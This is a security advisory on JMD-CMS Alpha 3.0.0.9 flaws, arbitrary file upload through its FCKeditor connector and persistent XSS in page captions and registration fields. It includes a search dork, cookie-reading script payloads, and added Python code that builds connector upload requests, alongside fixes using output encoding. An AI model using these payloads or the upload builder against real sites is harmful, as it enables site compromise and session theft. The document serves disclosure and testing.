'''
MOAUB #19
http://www.exploit-db.com/moaub-19-jmd-cms-multiple-remote-vulnerabilities/
'''

Abysssec Inc Public Advisory

Title            : JMD-CMS Multiple Remote Vulnerabilities
Affected Version : JMD-CMS Alpha 3.0.0.9
Discovery        : www.abysssec.com
Vendor           : http://www.jmdcms.com/
Download Links   : http://jmdcms.codeplex.com/releases/view/6674
Dork             : "powered by jmdcms.com"
Admin Page       : http://localhost/jmdcms/Login.aspx

Description :
===========================================================================================

This version of JMD-CMS (JMD-CMS Alpha 3.0.0.9) has multiple vulnerabilities:

1- Arbitrary file upload through the bundled FCKeditor
2- Persistent XSS

1) Arbitrary file upload through FCKeditor:
===========================================================================================

The FCKeditor file manager and its ASP.NET connector ship with the CMS and are exposed directly, so any file can be uploaded through either of these links:

http://localhost/jmdcms/FCKeditor/editor/fckeditor.html
or
http://localhost/jmdcms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx

Uploaded files are stored under this path:

http://localhost/UserFiles/Image/

2) Persistent XSS Vulnerabilities:
===========================================================================================

1- The Caption field of the Add Page form is vulnerable to persistent XSS (this page is accessible to the Admin):

http://localhost/jmdcms/addPage.aspx?Parent_Page=default

Vulnerable Code:
In App_Web_25otrp1v.dll ---> Modules_Admin_AddPage class

////////////////////////////////////////////
public void SavePage(string URI)
...
..
.
    // only Page_Name is touched ("~" replaced by "-"); Page_Caption goes to the stored procedure as typed
    this.Page_Name.Text = this.Page_Name.Text.Replace("~", "-");
    try
    {
        server.JMD_PAGE_SAVE(this.Page_Id.Value, Util.SiteURL(URI), this.Page_Name.Text,
            this.Page_Caption.Text, this.Meta_Title.Text, this.Meta_Desc.Text,
            this.Meta_Keywords.Text, this.Parent_Page_Name.Text, str, str2, str3,
            this.CBLToString(this.View_Roles), this.CBLToString(this.Add_Roles),
            this.CBLToString(this.Edit_Roles), this.CBLToString(this.Delete_Roles),
            this.CBLToString(this.Move_Roles), this.CBLToString(this.Add_Module_Roles),
            "0", str4, this.Page_Sort.Text, str5);
    ...
}
////////////////////////////////////////////

As you can see, there is no sanitization of the value this.Page_Caption.Text; it is stored exactly as entered. For example, Caption can be:

<script>alert(document.cookie)</script>

2- In the Register page:

http://localhost/jmdcms/NewUser.aspx

Code:
In App_Web_25otrp1v.dll ---> Modules_Core_NewUser class

////////////////////////////////////////////
public bool SaveUser()
...
..
.
    try
    {
        // user name, display name and e-mail are inserted without any filtering
        server.JMD_USER_INSERT(this.User_Id.Value,
            Util.SiteURL(base.Request.QueryString["Pg"].ToString()),
            this.User_Name.Text, this.User_Display_Name.Text, str, salt, this.Email.Text);
    ...
}
////////////////////////////////////////////

No sanitization is applied to these values. For example, you can enter the following on the Register page (each field is limited to 50 characters, and these values fit):

UserID      = user<script>alert(document.cookie)</script>
DisplayName = user<script>alert(document.cookie)</script>
Password    = user
Email       = ur@yah.com<script>alert(document.cookie)</script>

When the Admin views the user list, your script runs in the Admin's browser:

http://localhost/jmdcms/Users.aspx

===========================================================================================
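The following Python is an added example for section 1 and is not code from the advisory or from JMD-CMS. It builds the two requests behind the browser.html link above and parses the connector's replies, so a tester can confirm the connector is reachable before touching the file system. The command names (GetFoldersAndFiles, FileUpload), the Type/CurrentFolder parameters, the NewFile form field and the OnUploadCompleted reply format are taken from FCKeditor 2.x's published connector protocol, not from the advisory; which file extensions this particular CMS build accepts (and whether an uploaded .aspx would execute under /UserFiles/Image/) is an assumption that has to be verified against the target, since the advisory only states that arbitrary files are accepted. The send callable is injected so the checks can run offline against canned responses.

```python
"""Probe the FCKeditor ASP.NET connector that JMD-CMS bundles (added example)."""
import re
import uuid
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

# Connector path resolved from the advisory's browser.html link:
# browser/default/browser.html?...&Connector=connectors/aspx/connector.aspx
CONNECTOR_PATH = ("/jmdcms/FCKeditor/editor/filemanager/browser/default/"
                  "connectors/aspx/connector.aspx")


def list_url(base, resource_type="Image", folder="/"):
    """URL of the directory listing the file browser requests on load (FCKeditor protocol)."""
    q = urlencode({"Command": "GetFoldersAndFiles", "Type": resource_type,
                   "CurrentFolder": folder})
    return f"{base}{CONNECTOR_PATH}?{q}"


def parse_listing(xml_text):
    """Return (error_number, [file names]) from a connector XML reply, or None when the
    body is not a connector document (for example a login page or a 404 body)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    if root.tag != "Connector":
        return None
    err = root.find("Error")                      # only present on failure
    number = int(err.get("number", "0")) if err is not None else 0
    return number, [f.get("name") for f in root.iter("File")]


def connector_exposed(base, send):
    """send(url) -> response body. True when the listing command answers with a
    well-formed Connector document and no error, i.e. the connector is usable."""
    parsed = parse_listing(send(list_url(base)))
    return parsed is not None and parsed[0] == 0


def build_upload(base, filename, content, resource_type="Image", folder="/"):
    """(url, headers, body) for the FileUpload command: a multipart POST whose single
    part is named NewFile, exactly what browser.html's upload form submits."""
    boundary = "----fck" + uuid.uuid4().hex
    q = urlencode({"Command": "FileUpload", "Type": resource_type,
                   "CurrentFolder": folder})
    url = f"{base}{CONNECTOR_PATH}?{q}"
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="NewFile"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}",
               "Content-Length": str(len(body))}
    return url, headers, body


# The connector answers FileUpload with a script calling
# OnUploadCompleted(errorNumber, fileUrl, fileName, customMsg) in 2.6-era builds;
# older builds pass only the error number, so the url/name groups are optional.
_UPLOAD_RE = re.compile(
    r"OnUploadCompleted\(\s*(\d+)(?:\s*,\s*'([^']*)')?(?:\s*,\s*'([^']*)')?")


def parse_upload_result(html):
    """(error_number, file_url_or_None, file_name_or_None), or None if no callback found.
    0 means stored as named; 201 means stored under a renamed file (name collision)."""
    m = _UPLOAD_RE.search(html)
    if not m:
        return None
    return int(m.group(1)), m.group(2), m.group(3)
```

In use, point send at an HTTP client of your choice, check connector_exposed first, and only then submit a harmless marker file through build_upload; the returned file URL should land under the /UserFiles/Image/ path the advisory names.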
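The following Python is an added example covering both persistent XSS cases (the Page Caption in section 2-1 and the registration fields in section 2-2); it is not code from the advisory or from JMD-CMS. The stored values are what JMD_PAGE_SAVE and JMD_USER_INSERT persist unchanged; the sink is the admin page (Users.aspx, or the page rendering the caption) writing them into HTML without encoding. The two render functions are hypothetical stand-ins for that listing, one with the bug and one with the fix (HTML-encode at output, the equivalent of HttpUtility.HtmlEncode in ASP.NET), and validate_registration is an added input-side check that enforces the 50-character limit the advisory mentions and rejects markup in identity fields. The STORED_USER sample is constructed from the advisory's example values.

```python
"""Stored XSS through JMD-CMS registration fields, modelled in Python (added example)."""
import html
import re

FIELD_LIMIT = 50        # per-field limit on NewUser.aspx, as stated in the advisory
PAYLOAD = "<script>alert(document.cookie)</script>"
USER_FIELDS = ("UserID", "DisplayName", "Email")

# Constructed sample: what JMD_USER_INSERT stores for the advisory's example input.
STORED_USER = {
    "UserID": "user" + PAYLOAD,
    "DisplayName": "user" + PAYLOAD,
    "Email": "ur@yah.com" + PAYLOAD,
}

_MARKUP_CHARS = re.compile("[<>\"']")
_SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
# Deliberately strict: a mailbox, an @, a domain with a dotted TLD, nothing else.
_PLAIN_EMAIL = re.compile(r"[^@\s<>\"']+@[^@\s<>\"']+\.[A-Za-z]{2,}")


def fits_field_limit(value, limit=FIELD_LIMIT):
    """The form's length limit is the only constraint the payload must satisfy."""
    return len(value) <= limit


def render_user_row_unsafe(user):
    """The bug: stored values concatenated straight into markup, so the admin's
    browser parses the stored <script> as a script and runs it."""
    cells = "".join(f"<td>{user[k]}</td>" for k in USER_FIELDS)
    return f"<tr>{cells}</tr>"


def render_user_row_safe(user):
    """The fix: encode every stored value at output time. The same treatment
    applies to Page_Caption wherever the caption is written into a page."""
    cells = "".join(f"<td>{html.escape(user[k], quote=True)}</td>" for k in USER_FIELDS)
    return f"<tr>{cells}</tr>"


def active_script_tags(page_html):
    """Number of live <script> openers in rendered output. A payload that survived
    unencoded counts; an encoded one (&lt;script&gt;) does not."""
    return len(_SCRIPT_OPEN.findall(page_html))


def validate_registration(fields):
    """Input-side defence to add on top of output encoding (never instead of it):
    returns a list of problems, empty when the registration is acceptable."""
    problems = []
    for name in ("UserID", "DisplayName"):
        if not fits_field_limit(fields[name]):
            problems.append(f"{name}: longer than {FIELD_LIMIT} characters")
        if _MARKUP_CHARS.search(fields[name]):
            problems.append(f"{name}: markup characters are not allowed")
    if not fits_field_limit(fields["Email"]) or not _PLAIN_EMAIL.fullmatch(fields["Email"]):
        problems.append("Email: not a plain address")
    return problems
```

The length check is worth keeping in mind when triaging: the advisory's three example values are 43, 43 and 49 characters, so the 50-character limit does not block them, and a limit alone is never a substitute for encoding at the sink.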